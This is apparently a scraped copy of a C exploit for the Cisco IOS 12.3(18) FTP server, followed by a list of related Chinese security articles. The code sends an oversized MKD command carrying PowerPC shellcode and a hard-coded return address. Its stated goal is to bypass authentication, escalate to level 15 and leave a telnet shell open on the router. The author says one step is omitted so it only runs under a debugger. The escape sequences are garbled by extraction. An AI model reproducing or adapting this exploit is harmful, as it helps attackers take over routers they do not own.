/*Cisco IOS FTP server remote exploit by Andy Davis 2008

Cisco Advisory ID: cisco-sa-20070509-iosftp - May 2007

Specific hard-coded addresses for IOS 12.3

(18) on a 2621XM router

Removes the requirement to authenticate and escalates to level 15

*********************************************************************

To protect the innocent a critical step has been omitted, which means

the shellcode will only execute when the router is attached to gdb.

I'm sure the PowerPC shellcoders out there will work it out...

*********************************************************************

Thanks to Gyan Chawdhary and Varun Uppal for all the hours they spent

on the original IOS security research

iosftpexploit googlemail 'dot' com */#include

#include

#include

#include #define PORT 21int main(int argc, char **argv)

{

unsigned char sendbuf[] ="MKD "/* .equ vty_info, 0x8182da60 # pointer to VTY info */

/* .equ terminate, 0x80e4086c # kill a process */"x3cx80x81x83" /* lis 4,vty_info@ha */

"x38x84xdax60" /* la 4,vty_info@l

(4) */

"x7dx08x42x78" /* xor 8,8,8 */

"x7cxe4x40x2e" /* lwzx 7,4,8 */

"x91x07x01x74" /* stw 8,372

(7) */

"x39x08xffxff" /* subi 8,8,1 */

"x38xe7x09x1a" /* addi 7,7,233 */

"x91x07x04xca" /* stw 8,1226

(7) */

"x7dx03x43x78" /* mr 3,8 */

"x3cx80x80xe4" /* lis 4,terminate@ha */

"x38x84x08x6c" /* la 4,terminate@l

(4) */

"x7cx89x03xa6" /* mtctr 4 */

"x4ex80x04x20" /* bctr *//* exists cleanly without adversely affecting the FTP server */"x61x61x61x61" /* padding */

"x61x61x61x61" /* padding */

"x61x61x61x61" /* padding */

"x61x61x61x61" /* padding */

"x61x61x61x61" /* padding */

"x61x61x61x61" /* padding */"x80x06x23xB8" /* return address */

"x0dx0a";/* trampoline code */

/* when the overflow occurs r26 0x14 points to the shellcode */

/*

0x800623B8 lwz 26, 20

(26)

0x800623BC mtctr 26

0x800623C0 mr 3, 27

0x800623C4 bctrl

*/unsigned char recvbuf[256];

struct sockaddr_in servaddr;

int s;if (argc != 2)

{

printf ("nCisco IOS FTP server remote exploit by Andy Davis 2008n"); printf ("nUsage: %s n",argv[0]);

exit(-1);

}servaddr.sin_family = AF_INET;

servaddr.sin_addr.s_addr = inet_addr(argv[1]);

servaddr.sin_port = htons(PORT);s = socket(AF_INET, SOCK_STREAM, 0);

connect (s, (struct sockaddr *) &servaddr, sizeof(servaddr));

printf ("nCisco IOS FTP server remote exploit by Andy Davis 2008n");

printf ("Specific offsets for IOS 12.3

(18) on a 2621XM routernn");

printf ("Sending exploit...nn");if (send(s, sendbuf, sizeof(sendbuf)-1, 0) == 0)

{

printf("Error sending packet...quittingnn");

exit

(1);

}

recv (s, recvbuf, sizeof(recvbuf)-1,0);

printf ("Now telnet to the router for a shell...nn");

}

【Cisco IOS 12.3(18) FTP Server Remote Exploit (attached to gdb)】相关文章：

★ 剖析PHP纯符号一句话webshell的代码

★ Trojan是什么病毒？

★ Java防止SQL注入的几个途径

★ Apache Web服务器安全设置注意事项

★ 360安全天巡功能介绍

★ Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit

★ 浅析XSS与XSSI异同

★ BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (c)

★ 百度卫士百宝箱里有什么工具？

★ 金山毒霸桌面加速器怎么关闭